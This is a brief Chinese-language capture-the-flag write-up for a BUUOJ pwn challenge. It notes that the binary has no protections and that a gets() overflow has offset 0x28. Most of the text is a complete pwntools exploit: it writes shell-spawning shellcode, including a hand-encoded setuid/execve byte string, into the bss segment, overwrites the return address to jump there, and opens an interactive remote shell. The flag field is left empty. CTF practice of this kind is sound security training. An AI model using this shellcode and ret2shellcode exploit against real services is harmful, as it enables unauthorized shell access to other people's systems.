Checksec:
没开任何保护
Ida:
Read函数先将我们的输入写入bss段,然后再次调用gets函数存在溢出、offest=0x28
所以这题就是很标准的ret2shellcode:
构造exp:
from pwn import*
context(arch="amd64",log_level='debug',os='linux',terminal = ['tmux', 'sp', '-h'])
r=remote("node4.buuoj.cn",29164)
shell=asm(shellcraft.sh())
shell1="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
shell_addr=0x601080
payload=flat("a"*0x28)+p64(shell_addr)
r.recvuntil("name")
r.sendline(shell)
r.recvuntil("me?")
r.sendline(payload)
r.interactive()
Flag: